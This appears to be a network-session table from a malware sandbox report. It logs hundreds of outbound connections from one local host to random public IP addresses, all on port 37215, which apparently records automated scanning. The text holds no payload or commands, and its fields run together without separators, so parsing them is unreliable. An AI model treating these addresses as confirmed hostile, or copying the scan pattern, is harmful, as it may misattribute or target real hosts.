                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19266192.168.2.153786041.175.106.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19267192.168.2.1547774157.15.229.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19268192.168.2.155435237.191.63.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19269192.168.2.155584631.151.87.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19270192.168.2.1536160121.178.147.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19271192.168.2.1539936157.187.68.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19272192.168.2.155726845.210.224.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19273192.168.2.153358231.41.92.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19274192.168.2.155504094.158.171.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19275192.168.2.1539258138.166.178.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19276192.168.2.1546260146.153.25.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19277192.168.2.1551194186.63.100.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19278192.168.2.153403631.52.241.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19279192.168.2.1541444197.57.84.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19280192.168.2.1545052222.161.9.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19281192.168.2.1547068197.219.54.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19282192.168.2.155012694.174.190.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19283192.168.2.1536272156.184.157.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19284192.168.2.153477057.61.209.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19285192.168.2.1552538190.77.207.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19286192.168.2.154962241.120.100.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19287192.168.2.1545048138.67.181.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19288192.168.2.1545938222.141.182.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19289192.168.2.1552940156.124.102.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19290192.168.2.1559838156.110.136.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19291192.168.2.1557854197.132.76.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19292192.168.2.1551874197.254.43.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19293192.168.2.1542186121.169.79.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19294192.168.2.1548942138.110.158.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19295192.168.2.1550192186.6.214.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19296192.168.2.1538484122.76.98.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19297192.168.2.1554108190.89.233.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19298192.168.2.1552886138.75.203.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19299192.168.2.1548460222.83.34.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19300192.168.2.155553237.38.88.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19301192.168.2.1548452186.101.236.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19302192.168.2.1541554181.165.22.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19303192.168.2.1534202222.179.4.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19304192.168.2.1558534156.42.64.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19305192.168.2.1535130157.207.0.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19306192.168.2.1534768130.61.64.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19307192.168.2.1540566102.255.4.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19308192.168.2.1542178122.39.133.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19309192.168.2.1541148138.164.160.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19310192.168.2.1555134121.82.51.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19311192.168.2.1548580186.104.99.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19312192.168.2.1547070186.152.93.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19313192.168.2.1538224190.91.151.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19314192.168.2.1552208222.6.110.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19315192.168.2.153736841.173.194.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19316192.168.2.1559720122.239.181.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19317192.168.2.1550542138.202.1.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19318192.168.2.1559134122.221.116.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19319192.168.2.1548818121.246.217.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19320192.168.2.1556696190.210.73.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19321192.168.2.1542066122.216.82.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19322192.168.2.156078241.89.68.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19323192.168.2.1551514157.217.77.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19324192.168.2.1546376157.24.123.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19325192.168.2.154845645.26.162.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19326192.168.2.1532958156.69.6.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19327192.168.2.1547756102.225.134.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19328192.168.2.1548104157.217.232.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19329192.168.2.154226825.113.148.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19330192.168.2.1541116190.91.125.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19331192.168.2.153363431.102.174.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19332192.168.2.1559252222.46.107.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19333192.168.2.155058294.90.137.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19334192.168.2.1549320190.230.218.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19335192.168.2.1550148122.94.54.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19336192.168.2.154107846.192.187.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19337192.168.2.155988631.34.106.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19338192.168.2.1536924190.159.61.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19339192.168.2.1533090190.122.126.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19340192.168.2.1548538143.19.201.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19341192.168.2.1553692186.169.192.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19342192.168.2.1540504157.77.196.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19343192.168.2.1558498157.0.236.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19344192.168.2.154020031.186.138.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19345192.168.2.1543120197.255.24.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19346192.168.2.154337845.108.37.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19347192.168.2.155150631.13.235.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19348192.168.2.1533998121.81.186.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19349192.168.2.1532834102.86.190.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19350192.168.2.154658841.47.101.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19351192.168.2.154287294.182.121.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19352192.168.2.154802245.220.181.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19353192.168.2.154645294.58.38.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19354192.168.2.154096273.207.63.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19355192.168.2.1555540222.185.193.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19356192.168.2.1536726157.19.125.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19357192.168.2.154041045.48.239.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19358192.168.2.154361694.104.67.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19359192.168.2.1544986186.198.162.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19360192.168.2.1559822138.167.195.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19361192.168.2.154411631.247.231.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19362192.168.2.1539300138.213.31.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19363192.168.2.1557904102.17.186.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19364192.168.2.1543380138.214.172.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19365192.168.2.1558376197.173.174.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19366192.168.2.1537648190.207.171.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19367192.168.2.1557278102.138.182.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19368192.168.2.1537646121.147.62.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19369192.168.2.155722631.10.120.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19370192.168.2.154668694.115.77.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19371192.168.2.1533812121.172.162.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19372192.168.2.1552704197.209.209.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19373192.168.2.1545252181.22.134.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19374192.168.2.1560676190.238.235.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19375192.168.2.1551764157.168.215.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19376192.168.2.1558296222.194.179.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19377192.168.2.1545508181.252.209.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19378192.168.2.155041694.236.175.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19379192.168.2.1550586197.99.217.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19380192.168.2.1538534157.214.195.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19381192.168.2.1558284181.124.195.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19382192.168.2.1537294190.44.18.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19383192.168.2.1539468138.213.188.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19384192.168.2.1550998149.50.64.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19385192.168.2.1558038121.220.61.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19386192.168.2.1534976222.0.87.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19387192.168.2.1552962156.132.7.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19388192.168.2.155980878.239.66.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19389192.168.2.1549610157.229.119.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19390192.168.2.1541410122.174.186.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19391192.168.2.1551050157.111.100.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19392192.168.2.1536882122.222.99.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19393192.168.2.154630241.208.3.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19394192.168.2.1538142138.86.184.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19395192.168.2.1539258157.248.88.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19396192.168.2.1558034121.60.228.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19397192.168.2.1541492121.177.101.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19398192.168.2.153869453.28.89.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19399192.168.2.1540588186.36.246.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19400192.168.2.1532908197.196.241.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19401192.168.2.1542250138.15.9.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19402192.168.2.1557850156.23.209.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19403192.168.2.1553848156.190.238.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19404192.168.2.156026494.218.87.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19405192.168.2.1541304138.186.114.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19406192.168.2.1535612157.95.30.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19407192.168.2.1553976156.114.54.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19408192.168.2.1550924121.235.153.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19409192.168.2.1536356102.230.95.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19410192.168.2.1543520122.98.2.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19411192.168.2.1544254181.135.200.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19412192.168.2.1539436122.160.225.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19413192.168.2.155501237.213.188.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19414192.168.2.1560494186.111.251.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19415192.168.2.1538172122.139.48.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19416192.168.2.1541364121.232.133.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19417192.168.2.1546148122.180.23.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19418192.168.2.155413431.165.15.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19419192.168.2.1542128181.37.106.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19420192.168.2.1558098138.255.20.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19421192.168.2.1539002138.229.154.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19422192.168.2.1560220190.126.203.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19423192.168.2.1539456122.56.101.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19424192.168.2.1556250190.96.89.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19425192.168.2.153515694.184.73.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19426192.168.2.1548824121.149.241.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19427192.168.2.1550216197.47.147.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19428192.168.2.154925294.149.105.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19429192.168.2.1537442122.183.44.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19430192.168.2.1545962102.223.8.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19431192.168.2.1560328186.224.223.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19432192.168.2.1542252186.234.249.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19433192.168.2.1547278181.155.47.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19434192.168.2.1550710197.235.54.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19435192.168.2.1555604122.5.12.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19436192.168.2.1544940181.232.183.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19437192.168.2.155845431.200.41.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19438192.168.2.1546622157.85.211.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19439192.168.2.1557608157.23.98.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19440192.168.2.1557742121.135.234.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19441192.168.2.1546332197.139.22.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19442192.168.2.153930490.149.17.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19443192.168.2.1540972222.28.120.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19444192.168.2.1540040181.229.142.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19445192.168.2.1546964157.225.164.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19446192.168.2.155578631.187.159.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19447192.168.2.1554956157.182.133.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19448192.168.2.153831494.163.58.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19449192.168.2.1560022102.53.48.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19450192.168.2.154638445.97.125.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19451192.168.2.1542368122.100.249.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19452192.168.2.1536954102.188.2.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19453192.168.2.155774241.237.203.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19454192.168.2.1539600122.134.165.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19455192.168.2.154703294.48.47.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19456192.168.2.1540664181.41.176.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19457192.168.2.153838641.20.157.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19458192.168.2.1536938186.83.62.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19459192.168.2.1554334121.81.12.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19460192.168.2.1545096190.249.27.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19461192.168.2.155706894.174.17.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19462192.168.2.156077231.51.130.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19463192.168.2.153322845.131.170.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19464192.168.2.1556754157.59.219.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19465192.168.2.1544738190.144.69.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19466192.168.2.1544540121.222.108.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19467192.168.2.155983694.226.225.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19468192.168.2.1559238190.119.91.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19469192.168.2.1533830138.105.65.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19470192.168.2.153436837.152.101.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19471192.168.2.1550198157.53.205.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19472192.168.2.155461437.189.198.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19473192.168.2.1533640157.203.246.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19474192.168.2.1541518156.209.83.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19475192.168.2.1554988102.247.158.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19476192.168.2.1537322181.178.85.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19477192.168.2.1537804186.80.46.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19478192.168.2.1556484219.179.133.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19479192.168.2.1532820156.111.4.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19480192.168.2.155459837.105.196.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19481192.168.2.155861431.216.124.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19482192.168.2.154311037.158.32.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19483192.168.2.1552426156.70.127.19037215
                                              TimestampBytes transferredDirectionData


